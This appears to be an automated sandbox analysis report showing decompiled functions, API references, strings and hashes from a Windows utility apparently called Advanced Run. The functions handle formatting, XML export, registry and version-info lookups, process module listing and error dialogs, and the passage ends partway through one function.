API String ID: 1331804452-0
Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

APIs

memset.MSVCRT ref: 00405000
_snwprintf.MSVCRT ref: 00405027
wcscat.MSVCRT ref: 00405039
wcscat.MSVCRT ref: 00405056
wcscat.MSVCRT ref: 00405065

Strings

%2.2X, xrefs: 00405016

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC

Uniqueness

Uniqueness Score: -1.00%

Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}

APIs

memset.MSVCRT ref: 00407DA5
memset.MSVCRT ref: 00407DBA
_snwprintf.MSVCRT ref: 00407E04

Strings

<?xml version="1.0" ?>, xrefs: 00407DC9
<%s>, xrefs: 00407DF3
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}

0x00403b56
0x00403b5d
0x00403b6f
0x00403b76
0x00403b82
0x00403b8d
0x00403b8e
0x00403b99
0x00403b9e
0x00403b9f
0x00403ba7
0x00403bb9
0x00403bce
0x00403be5
0x00403bef
0x00403bf8
0x00403c00

APIs

memset.MSVCRT ref: 00403B5D
memset.MSVCRT ref: 00403B76

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

Advanced Run, xrefs: 00403BBE
"%s" /EXEFilename "%%1", xrefs: 00403B8E
exefile, xrefs: 00403BAD

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
API String ID: 1832587304-479876776
Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}

0x0040afd3
0x0040afe2
0x0040aff3
0x0040b002
0x0040b023
0x00000000
0x0040b047
0x0040b02e
0x0040b034
0x0040b03c
0x00000000

APIs

wcscpy.MSVCRT ref: 0040AFD3
wcscat.MSVCRT ref: 0040AFE2
wcscat.MSVCRT ref: 0040AFF3
wcscat.MSVCRT ref: 0040B002
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE

Strings

\StringFileInfo\, xrefs: 0040AFCD

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00405EB2
wcscpy.MSVCRT ref: 00405ED5

Strings

menu_%d, xrefs: 00405E96
general, xrefs: 00405ECB
dialog_%d, xrefs: 00405EA6
strings, xrefs: 00405EC0

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF

Uniqueness

Uniqueness Score: -1.00%

Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}

0x004092f3
0x004092fb
0x00409303
0x00409305
0x00409310
0x00409439
0x0040943f
0x00409445
0x0040944e
0x00409452
0x00409466
0x0040946e
0x00409475
0x004094f7
0x00409488
0x00409494
0x004094a5
0x004094a9
0x004094b5
0x004094c3
0x004094c6
0x004094d5
0x004094e3
0x004094f1
0x00000000
0x004094f1
0x00000000
0x004094e3
0x00000000
0x004094f7
0x00409452
0x00409322
0x0040932b
0x00409333
0x00409337
0x00409341
0x00409342
0x0040934e
0x0040934f
0x00409358
0x0040935e
0x0040935e
0x00409363
0x0040936b
0x0040936d
0x00409377
0x00409385
0x0040938d
0x0040939d
0x004093a5
0x004093ac
0x004093b4
0x004093c5
0x004093c9
0x004093da
0x004093df
0x004093e5
0x004093e6
0x004093ea
0x004093f6
0x004093fc
0x00409407
0x00409407
0x0040941d
0x00000000
0x00000000
0x00409423
0x00409428
0x00409375
0x00000000
0x00000000
0x0040942e
0x00000000
0x00409428
0x00409377
0x0040936d
0x004094fb
0x004094ff
0x004094ff
0x00409337
0x0040950f

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
memset.MSVCRT ref: 0040938D
memset.MSVCRT ref: 0040939D

Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233

memset.MSVCRT ref: 00409488
wcscpy.MSVCRT ref: 004094A9
CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x00402ed7
0x00402eee
0x00402ef8
0x00402f00
0x00402f01
0x00402f05
0x00402f0a
0x00402f1a
0x00402f30

APIs

GetClientRect.USER32 ref: 00402ED7
GetSystemMetrics.USER32 ref: 00402EE5
GetSystemMetrics.USER32 ref: 00402EF1
BeginPaint.USER32(?,?), ref: 00402F0B
DrawFrameControl.USER32 ref: 00402F1A
EndPaint.USER32(?,?), ref: 00402F27

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}

APIs

memset.MSVCRT ref: 004079DB

Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407A25

Strings

<item>, xrefs: 004079AE
<%s>%s</%s>, xrefs: 00407A18
</item>, xrefs: 00407A41

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}

0x00404683
0x00404692
0x00404699
0x0040469b
0x004046af
0x004046ba
0x004046bc
0x004046c7
0x004046cc
0x004046cd
0x004046ee
0x004046f3
0x004046fa
0x004046fa
0x004046ee
0x00404705

APIs

memset.MSVCRT ref: 004046AF
_snwprintf.MSVCRT ref: 004046CD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

%s\shell\%s, xrefs: 004046BC

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen_snwprintfmemset
String ID: %s\shell\%s
API String ID: 1458959524-3196117466
Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

APIs

wcschr.MSVCRT ref: 00409D79
_snwprintf.MSVCRT ref: 00409D9E
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
GetPrivateProfileStringW.KERNEL32 ref: 00409DD4

Strings

"%s", xrefs: 00409D8D

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004047d2
0x004047da
0x004047e0
0x004047e4
0x004047ec
0x004047ec
0x004047f5
0x00404800
0x00404801
0x00404802
0x0040480d
0x00404812
0x00404813
0x00404834

APIs

GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
_snwprintf.MSVCRT ref: 00404813
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C

Strings

Error %d: %s, xrefs: 00404802
Error, xrefs: 0040481D

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C

Uniqueness

Uniqueness Score: -1.00%

Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
